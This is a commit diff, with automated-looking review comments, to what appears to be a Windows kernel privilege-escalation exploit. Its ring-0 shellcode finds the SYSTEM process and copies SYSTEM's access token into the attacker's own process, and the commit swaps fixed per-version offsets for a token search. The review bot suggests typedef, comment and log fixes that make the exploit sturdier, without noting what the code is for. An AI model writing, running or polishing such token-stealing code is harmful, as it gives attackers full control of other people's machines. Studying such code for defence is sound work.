Search the AccessToken
parent
71a6ec8b12
commit
03a84a1de3
@ -38,6 +38,10 @@ typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
OUT PVOID Process
);
typedef NTSTATUS(NTAPI *lPsReferencePrimaryToken)(
_Inout_ PVOID Process
);
typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
_In_ DWORD SystemInformationClass,
_Inout_ PVOID SystemInformation,
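Review bot: The new `lPsReferencePrimaryToken` typedef declares an `NTSTATUS` return and an `_Inout_` process argument, while the routine it stands for returns the token pointer and only reads the process object; the call sites later in this commit have to cast its result to `PACCESS_TOKEN`, which is the symptom of the mismatch. Declare it as `typedef PACCESS_TOKEN (NTAPI *lPsReferencePrimaryToken)(_In_ PVOID Process);` so the casts at the call sites can be dropped and the compiler checks the assignments. The preceding `lPsLookupProcessByProcessId` typedef starts outside this hunk.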
@ -70,9 +74,9 @@ BOOL bHookCallbackFlag = FALSE;
WNDPROC lpPrevWndFunc;
DWORD dwMyProcessId = 0;
DWORD dwOffsetWindows = 0;
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
lPsReferencePrimaryToken pPsReferencePrimaryToken = NULL;
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
#ifdef DEBUGGING
@ -131,16 +135,53 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void)
#endif
}
// Search the specified data structure for a member with CurrentValue.
BOOL FindAndReplaceMember(PDWORD Structure,
DWORD CurrentValue,
DWORD NewValue,
DWORD MaxSize)
{
DWORD i, Mask;
// Microsoft QWORD aligns object pointers, then uses the lower three
// bits for quick reference counting.
Mask = ~7;
// Mask out the reference count.
CurrentValue &= Mask;
// Scan the structure for any occurrence of CurrentValue.
for (i = 0; i < MaxSize; i++) {
if ((Structure[i] & Mask) == CurrentValue) {
// And finally, replace it with NewValue.
Structure[i] = NewValue;
return TRUE;
}
}
// Member not found.
return FALSE;
}
int _stdcall shellcode_ring0(int one, int two, int three, int four)
{
void *my_process_info = NULL;
void *system_info = NULL;
void *pMyProcessInfo = NULL;
void *pSystemInfo = NULL;
PACCESS_TOKEN SystemToken;
PACCESS_TOKEN TargetToken;
pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &my_process_info);
pPsLookupProcessByProcessId((HANDLE)4, &system_info);
pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &pMyProcessInfo);
pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);
*(PDWORD)((PBYTE)my_process_info + dwOffsetWindows) = *(PDWORD)((PBYTE)system_info + dwOffsetWindows);
TargetToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pMyProcessInfo);
SystemToken = (PACCESS_TOKEN)pPsReferencePrimaryToken(pSystemInfo);
// Find the token in the target process, and replace with the system token.
FindAndReplaceMember((PDWORD)pMyProcessInfo,
(DWORD)TargetToken,
(DWORD)SystemToken,
0x200);
return 0;
}
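Review bot: `shellcode_ring0` takes four `int` parameters (`one` .. `four`) that its body never reads, and it resolves the same two process objects twice — once into `my_process_info`/`system_info` and again into `pMyProcessInfo`/`pSystemInfo` — with no comment explaining either choice. If the parameters exist only to match a caller's expected signature, state that in a header comment such as `// Parameters are unused; the signature matches the callback that dispatches here.` and let the second pair of lookups reuse the first pair's results instead of repeating them. The header comment on `FindAndReplaceMember` should also say that `MaxSize` is a count of DWORDs rather than bytes, since the loop indexes `PDWORD Structure` directly; the call site passes `0x200`, and a reader cannot tell which unit was meant.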
@ -169,61 +210,6 @@ void win32k_null_page(LPVOID lpPayload)
return;
}
#ifdef _M_X64
if (versionInfo.dwMajorVersion == 6 && versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
{
// Ex: Windows 7 SP1
dprintf("[*] Windows 6.1 found...");
dwOffsetWindows = 0x208;
}
#else
if (versionInfo.dwMajorVersion == 6)
{
if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
{
// Ex: Windows 7 SP1
dprintf("[*] Windows 6.1 found...");
dwOffsetWindows = 0xf8;
}
else if (!versionInfo.dwMinorVersion)
{
// Ex: Windows 2008 R2
dprintf("[*] Windows 6.0 found...");
dwOffsetWindows = 0xe0;
}
else
{
dprintf("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", versionInfo.dwMinorVersion);
return;
}
}
else if (versionInfo.dwMajorVersion == 5)
{
if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
{
// Ex: Windows XP SP3
dprintf("[*] Windows 5.1 found...");
dwOffsetWindows = 0xc8;
}
else if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 2)
{
// Ex: Windows 2003 SP2
dprintf("[*] Windows 5.2 found...");
dwOffsetWindows = 0xd8;
}
else
{
dprintf("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm");
return;
}
}
#endif
else
{
dprintf("[!] Major Version %d found, not supported", versionInfo.dwMajorVersion);
return;
}
// Solve symbols
dprintf("[*] Solving symbols...");
@ -321,6 +307,18 @@ void win32k_null_page(LPVOID lpPayload)
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD_PTR)pNtBase + ((DWORD_PTR)pPsLookupProcessByProcessId - (DWORD_PTR)hNtKrnl));
dprintf("[*] pPsLookupProcessByProcessId in kernel: 0x%p", pPsLookupProcessByProcessId);
pPsReferencePrimaryToken = (lPsReferencePrimaryToken)GetProcAddress(hNtKrnl, "PsReferencePrimaryToken");
if (pPsReferencePrimaryToken == NULL)
{
dprintf("[!] Failed to solve PsLookupProcessByProcessId");
return;
}
pPsReferencePrimaryToken = (lPsReferencePrimaryToken)((DWORD_PTR)pNtBase + ((DWORD_PTR)pPsReferencePrimaryToken - (DWORD_PTR)hNtKrnl));
dprintf("[*] pPsReferencePrimaryToken in kernel: 0x%p", pPsReferencePrimaryToken);
dwMyProcessId = GetCurrentProcessId();
// Register Class
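Review bot: The failure message in the new `pPsReferencePrimaryToken == NULL` branch names the wrong symbol: it prints `Failed to solve PsLookupProcessByProcessId` although the lookup that just failed is the `GetProcAddress` call for `PsReferencePrimaryToken`, so the log would point a reader at an export that resolved fine. Change it to `dprintf("[!] Failed to solve PsReferencePrimaryToken");`. The enclosing `win32k_null_page` function starts and ends outside this hunk.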